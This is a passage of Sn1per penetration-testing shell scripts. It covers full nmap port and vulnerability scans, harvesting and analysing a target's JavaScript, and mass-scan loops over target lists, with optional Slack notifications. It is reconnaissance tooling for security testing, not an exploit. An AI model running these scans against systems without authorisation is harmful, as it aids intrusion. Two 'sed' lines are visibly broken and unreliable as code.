+"%Y-%m-%d](%H:%M)"`${RESET}x•" 87 | SSL="false" 88 | PORT="80" 89 | source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh 90 | SSL="true" 91 | PORT="443" 92 | source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh 93 | for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do 94 | source $file 95 | done 96 | source 
$INSTALL_DIR/modes/sc0pe-network-scan.sh 97 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 98 | source $INSTALL_DIR/modes/sc0pe.sh 99 | fi 100 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 101 | echo -e "$OKRED SCAN COMPLETE! $RESET" 102 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 103 | loot 104 | exit 105 | fi 106 | 107 | if [[ "$MODE" = "port" ]]; then 108 | if [[ -z "$PORT" ]]; then 109 | echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET" 110 | exit 111 | fi 112 | fi 113 | -------------------------------------------------------------------------------- /modes/fullportscan.sh: -------------------------------------------------------------------------------- 1 | if [[ "$FULLNMAPSCAN" = "0" ]]; then 2 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 3 | echo -e "$OKRED SKIPPING FULL NMAP PORT SCAN $RESET" 4 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 5 | else 6 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 7 | echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET" 8 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 9 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> 
$LOOT_DIR/scans/notifications_new.txt 10 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 11 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 12 | fi 13 | mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null 14 | nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET 15 | sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null 16 | rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null 17 | xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null 18 | cp -f $LOOT_DIR/nmap/nmapreport-$TARGET.html $LOOT_DIR/nmap/nmapreport-$TARGET-`date +"%Y-%m-%d-%H-%M"`.html 2> /dev/null 19 | if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then 20 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt" 21 | fi 22 | sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null 23 | rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null 24 | HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null) 25 | if [[ ${#HOST_UP} -ge 2 ]]; then 26 | echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null 27 | fi 28 | sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null 29 | rm -f $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null 30 | for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do 31 | echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt 32 | done 33 | diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> 
/dev/null 34 | 35 | cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null 36 | 37 | cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null 38 | 39 | if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then 40 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt" 41 | fi 42 | if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then 43 | if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then 44 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 45 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff" 46 | fi 47 | echo "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 48 | cat $LOOT_DIR/nmap/ports-$TARGET.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt 49 | fi 50 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 51 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 52 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 53 | fi 54 | fi -------------------------------------------------------------------------------- /modes/javascript-analysis.sh: -------------------------------------------------------------------------------- 1 | mkdir -p $LOOT_DIR/web/javascript/$TARGET 2> /dev/null 2 | cd $LOOT_DIR/web/javascript/$TARGET 3 | echo -e 
"${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 4 | echo -e "$OKRED DOWNLOADING ALL JAVASCRIPT FILES $RESET" 5 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 6 | egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' 7 | for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done; 8 | for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | egrep -i 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done; 9 | for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | egrep -iv 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? 
-f1 | sort -u`; do echo "Downloading - https://$a" && FILENAME=$(echo "https://$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done; 10 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 11 | echo -e "$OKRED DISPLAYING ALL JAVASCRIPT COMMENTS $RESET" 12 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 13 | cat $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null | egrep "\/\/|\/\*" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-comments.txt 14 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 15 | echo -e "$OKRED DISPLAYING ALL JAVASCRIPT LINKS $RESET" 16 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 17 | cat $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-urls.txt 18 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 19 | echo -e "$OKRED RUNNING LINKFINDER $RESET" 20 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 21 | cd $PLUGINS_DIR/LinkFinder/ 22 | for a in `ls $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null`; do echo "Analyzing - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && python3 linkfinder.py -d -i $a -o cli 2> /dev/null | egrep -v "application\/|SSL error" > 
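$LOOT_DIR/web/javascript-linkfinder-$TARGET-$FILENAME.txt 2> /dev/null; done;
# Summarise every LinkFinder result file for this target: path-relative links,
# absolute URLs, and the hosts those URLs point at. Lines containing "Running "
# are LinkFinder's own progress output, not findings, and are dropped.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING PATH RELATIVE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep -hv "Running " $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | awk '{print $1}' | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-path-relative.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING JAVASCRIPT URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep -h http $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | egrep "http\:\/\/|https\:\/\/" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-linkfinder-urls.txt
# Merge the URL list produced earlier in this mode (javascript-$TARGET-urls.txt)
# with the LinkFinder URLs into one de-duplicated file.
sort -u $LOOT_DIR/web/javascript-$TARGET-urls.txt $LOOT_DIR/web/javascript-$TARGET-linkfinder-urls.txt 2> /dev/null > $LOOT_DIR/web/javascript-$TARGET-urls-sorted.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING JAVASCRIPT DOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
# The third "/"-separated field of an absolute URL is host[:port].
grep -h http $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | egrep "http\:\/\/|https\:\/\/" | cut -d\/ -f3 | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-domains.txt
WEB_JAVASCRIPT_ANALYSIS="0"
--------------------------------------------------------------------------------
/modes/massportscan.sh:
--------------------------------------------------------------------------------
# MASSPORTSCAN MODE ###############################################################################################
# Runs "sniper -m fullportonly" once for every target listed in $FILE (one
# target per line) and then builds the combined loot summary. Reads MODE, FILE,
# REPORT, WORKSPACE, INSTALL_DIR, LOOT_DIR, LOOT, SLACK_NOTIFICATIONS and the
# colour variables from the caller; `logo`, `loot` and `sniper` are provided by
# the main script.
if [[ "$MODE" = "massportscan" ]]; then
    if [[ -z "$FILE" ]]; then
        logo
        echo "You need to specify a list of targets (ie. -f ) to scan."
        exit
    fi
    if [[ "$REPORT" = "1" ]]; then
        # Read the list on fd 3, one target per line. Unlike `for a in $(cat $FILE)`
        # this never glob-expands a scope entry such as "*.example.com" against the
        # working directory, and a sniper child that reads stdin cannot consume the
        # remainder of the list. `|| [[ -n "$a" ]]` keeps a final line that lacks a
        # trailing newline.
        while IFS= read -r -u 3 a || [[ -n "$a" ]]; do
            a="${a%$'\r'}"              # tolerate CRLF target lists
            [[ -z "$a" ]] && continue   # blank lines are not targets
            if [[ -n "$WORKSPACE" ]]; then
                args="$args -w $WORKSPACE"
                WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
                echo -e "$OKBLUE[*]$RESET Saving loot to $WORKSPACE_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
                mkdir -p "$WORKSPACE_DIR"/{domains,screenshots,nmap,notes,reports,output} 2> /dev/null
            fi
            args="$args -m fullportonly --noreport --noloot"
            TARGET="$a"
            args="$args -t $TARGET"
            echo -e "$OKRED |"
            echo -e "$OKRED | |"
            echo -e "$OKRED | -/_\-"
            echo -e "$OKRED -/_\- ______________(/ . \)______________"
            echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
            echo -e "$OKRED <> \___/ <> <>"
            echo -e "$OKRED "
            echo -e "$OKRED ||"
            echo -e "$OKRED <>"
            echo -e "$OKRED ||"
            echo -e "$OKRED <>"
            echo -e "$OKRED ||"
            echo -e "$OKRED || BIG"
            echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
            echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
            echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
            echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
            echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
            echo -e "$OKRED | ||. | | | ||| |||||"
            echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
            echo -e "$OKRED | ||. | | | ||| |||||"
            echo -e "$OKRED __________________________________________________________"
            echo -e "$RESET"
            if [[ -n "$WORKSPACE_DIR" ]]; then
                echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" >> "$LOOT_DIR/scans/tasks.txt" 2> /dev/null
                echo "sniper -t $TARGET -m $MODE --noreport $args" >> "$LOOT_DIR/scans/$TARGET-$MODE.txt"
                if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
                    /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
                fi
                # $args is an intentionally unquoted option string; "2>&1" has to sit
                # before the pipe for sniper's stderr to reach the log file.
                sniper $args 2>&1 | tee "$WORKSPACE_DIR/output/sniper-$TARGET-$MODE-$(date +"%Y%m%d%H%M").txt"
            else
                echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" >> "$LOOT_DIR/scans/tasks.txt" 2> /dev/null
                echo "sniper -t $TARGET -m $MODE --noreport $args" >> "$LOOT_DIR/scans/$TARGET-$MODE.txt"
                sniper $args 2>&1 | tee "$LOOT_DIR/output/sniper-$TARGET-$MODE-$(date +"%Y%m%d%H%M").txt"
            fi
            args=""
        done 3< "$FILE"
    fi
    echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> "$LOOT_DIR/scans/notifications_new.txt"
    if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
        /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
    fi
    if [[ "$LOOT" = "1" ]]; then
        loot
    fi

    exit
fi
--------------------------------------------------------------------------------
/modes/massvulnscan.sh: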
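--------------------------------------------------------------------------------
# MASSVULNSCAN MODE ###############################################################################################
# Runs "sniper -m vulnscan" once for every target listed in $FILE (one target
# per line), records each run under scans/ and notifies Slack when enabled.
# Reads MODE, FILE, REPORT, WORKSPACE, INSTALL_DIR, LOOT_DIR, LOOT,
# SLACK_NOTIFICATIONS and the colour variables from the caller; `logo`, `loot`
# and `sniper` are provided by the main script.
if [[ "$MODE" = "massvulnscan" ]]; then
    if [[ -z "$FILE" ]]; then
        logo
        echo "You need to specify a list of targets (ie. -f ) to scan."
        exit
    fi
    if [[ "$REPORT" = "1" ]]; then
        # Read the list on fd 3, one target per line. Unlike `for a in $(cat $FILE)`
        # this never glob-expands a scope entry such as "*.example.com" against the
        # working directory, and a sniper child that reads stdin cannot consume the
        # remainder of the list. `|| [[ -n "$a" ]]` keeps a final line that lacks a
        # trailing newline.
        while IFS= read -r -u 3 a || [[ -n "$a" ]]; do
            a="${a%$'\r'}"              # tolerate CRLF target lists
            [[ -z "$a" ]] && continue   # blank lines are not targets
            if [[ -n "$WORKSPACE" ]]; then
                args="$args -w $WORKSPACE"
                WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
                echo -e "$OKBLUE[*]$RESET Saving loot to $WORKSPACE_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
                mkdir -p "$WORKSPACE_DIR"/{domains,screenshots,nmap,notes,reports,output} 2> /dev/null
            fi
            args="$args -m vulnscan --noreport --noloot"
            TARGET="$a"
            args="$args -t $TARGET"
            echo -e "$OKRED |"
            echo -e "$OKRED | |"
            echo -e "$OKRED | -/_\-"
            echo -e "$OKRED -/_\- ______________(/ . \)______________"
            echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
            echo -e "$OKRED <> \___/ <> <>"
            echo -e "$OKRED "
            echo -e "$OKRED ||"
            echo -e "$OKRED <>"
            echo -e "$OKRED ||"
            echo -e "$OKRED <>"
            echo -e "$OKRED ||"
            echo -e "$OKRED || BIG"
            echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
            echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
            echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
            echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
            echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
            echo -e "$OKRED | ||. | | | ||| |||||"
            echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
            echo -e "$OKRED | ||. | | | ||| |||||"
            echo -e "$OKRED __________________________________________________________"
            echo -e "$RESET"
            if [[ -n "$WORKSPACE_DIR" ]]; then
                echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" >> "$LOOT_DIR/scans/tasks.txt" 2> /dev/null
                echo "sniper -t $TARGET -m $MODE --noreport $args" >> "$LOOT_DIR/scans/$TARGET-$MODE.txt"
                echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> "$LOOT_DIR/scans/notifications_new.txt"
                if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
                    /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
                fi
                # $args is an intentionally unquoted option string; "2>&1" has to sit
                # before the pipe for sniper's stderr to reach the log file.
                sniper $args 2>&1 | tee "$WORKSPACE_DIR/output/sniper-$TARGET-$MODE-$(date +"%Y%m%d%H%M").txt"
            else
                echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" >> "$LOOT_DIR/scans/tasks.txt" 2> /dev/null
                echo "sniper -t $TARGET -m $MODE --noreport $args" >> "$LOOT_DIR/scans/$TARGET-$MODE.txt"
                sniper $args 2>&1 | tee "$LOOT_DIR/output/sniper-$TARGET-$MODE-$(date +"%Y%m%d%H%M").txt"
            fi
            args=""
        done 3< "$FILE"
    fi
    echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> "$LOOT_DIR/scans/notifications_new.txt"
    if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
        /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
    fi
    if [[ "$LOOT" = "1" ]]; then
        loot
    fi

    exit
fi
--------------------------------------------------------------------------------
/modes/massweb.sh:
--------------------------------------------------------------------------------
# MASSWEB MODE #####################################################################################################
# Runs "sniper -m web" once for every target listed in $FILE (one target per
# line). Same inputs and helpers as the other mass modes: MODE, FILE, REPORT,
# WORKSPACE, INSTALL_DIR, LOOT_DIR, LOOT, SLACK_NOTIFICATIONS, colour variables,
# and `logo`, `loot`, `sniper` from the main script.
if [[ "$MODE" = "massweb" ]]; then
    if [[ -z "$FILE" ]]; then
        logo
        echo "You need to specify a list of targets (ie. -f ) to scan."
        exit
    fi
    if [[ "$REPORT" = "1" ]]; then
        # One target per line on fd 3: no glob expansion of scope entries such as
        # "*.example.com", and a sniper child reading stdin cannot eat the list.
        while IFS= read -r -u 3 a || [[ -n "$a" ]]; do
            a="${a%$'\r'}"              # tolerate CRLF target lists
            [[ -z "$a" ]] && continue   # blank lines are not targets
            if [[ -n "$WORKSPACE" ]]; then
                args="$args -w $WORKSPACE"
                WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
                echo -e "$OKBLUE[*]$RESET Saving loot to $WORKSPACE_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
                mkdir -p "$WORKSPACE_DIR"/{domains,screenshots,nmap,notes,reports,output} 2> /dev/null
            fi
            args="$args -m web --noreport --noloot"
            TARGET="$a"
            args="$args -t $TARGET"
            echo -e "$OKRED |"
            echo -e "$OKRED | |"
            echo -e "$OKRED | -/_\-"
            echo -e "$OKRED -/_\- ______________(/ . \)______________"
            echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
            echo -e "$OKRED <> \___/ <> <>"
            echo -e "$OKRED "
            echo -e "$OKRED ||"
            echo -e "$OKRED <>"
            echo -e "$OKRED ||"
            echo -e "$OKRED <>"
            echo -e "$OKRED ||"
            echo -e "$OKRED || BIG"
            echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
            echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
            echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
            echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
            echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
            echo -e "$OKRED | ||. | | | ||| |||||"
            echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
            echo -e "$OKRED | ||. | | | ||| |||||"
            echo -e "$OKRED __________________________________________________________"
            echo -e "$RESET"
            # Unlike the other mass modes, web mode does not record the target in
            # scans/tasks.txt.
            if [[ -n "$WORKSPACE_DIR" ]]; then
                echo "sniper -t $TARGET -m $MODE --noreport $args" >> "$LOOT_DIR/scans/$TARGET-$MODE.txt"
                echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> "$LOOT_DIR/scans/notifications_new.txt"
                if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
                    /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
                fi
                # $args is an intentionally unquoted option string; "2>&1" has to sit
                # before the pipe for sniper's stderr to reach the log file.
                sniper $args 2>&1 | tee "$WORKSPACE_DIR/output/sniper-$TARGET-$MODE-$(date +"%Y%m%d%H%M").txt"
            else
                echo "sniper -t $TARGET -m $MODE --noreport $args" >> "$LOOT_DIR/scans/$TARGET-$MODE.txt"
                sniper $args 2>&1 | tee "$LOOT_DIR/output/sniper-$TARGET-$MODE-$(date +"%Y%m%d%H%M").txt"
            fi
            args=""
        done 3< "$FILE"
    fi
    echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> "$LOOT_DIR/scans/notifications_new.txt"
    if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
        /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
    fi
    if [[ "$LOOT" = "1" ]]; then
        loot
    fi

    exit
fi
--------------------------------------------------------------------------------
/modes/masswebscan.sh:
--------------------------------------------------------------------------------
# MASSWEBSCAN MODE #################################################################################################
# Runs "sniper -m webscan" once for every target listed in $FILE (one target
# per line); no banner is printed per target. Same inputs and helpers as the
# other mass modes.
if [[ "$MODE" = "masswebscan" ]]; then
    if [[ -z "$FILE" ]]; then
        logo
        echo "You need to specify a list of targets (ie. -f ) to scan."
        exit
    fi
    if [[ "$REPORT" = "1" ]]; then
        # One target per line on fd 3: no glob expansion of scope entries such as
        # "*.example.com", and a sniper child reading stdin cannot eat the list.
        while IFS= read -r -u 3 a || [[ -n "$a" ]]; do
            a="${a%$'\r'}"              # tolerate CRLF target lists
            [[ -z "$a" ]] && continue   # blank lines are not targets
            if [[ -n "$WORKSPACE" ]]; then
                args="$args -w $WORKSPACE"
                WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
                echo -e "$OKBLUE[*]$RESET Saving loot to $WORKSPACE_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
                # webscan additionally needs vulnerabilities/ and scans/ in the workspace.
                mkdir -p "$WORKSPACE_DIR"/{domains,screenshots,nmap,notes,reports,output,vulnerabilities,scans} 2> /dev/null
            fi
            args="$args -m webscan --noreport --noloot"
            TARGET="$a"
            args="$args -t $TARGET"
            if [[ -n "$WORKSPACE_DIR" ]]; then
                echo "sniper -t $TARGET -m $MODE --noreport $args" >> "$LOOT_DIR/scans/$TARGET-$MODE.txt"
                echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> "$LOOT_DIR/scans/notifications_new.txt"
                if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
                    /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
                fi
                # $args is an intentionally unquoted option string; "2>&1" has to sit
                # before the pipe for sniper's stderr to reach the log file.
                sniper $args 2>&1 | tee "$WORKSPACE_DIR/output/sniper-$TARGET-$MODE-$(date +"%Y%m%d%H%M").txt"
            else
                echo "sniper -t $TARGET -m $MODE --noreport $args" >> "$LOOT_DIR/scans/$TARGET-$MODE.txt"
                sniper $args 2>&1 | tee "$LOOT_DIR/output/sniper-$TARGET-$MODE-$(date +"%Y%m%d%H%M").txt"
            fi
            args=""
        done 3< "$FILE"
    fi

    echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> "$LOOT_DIR/scans/notifications_new.txt"
    if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
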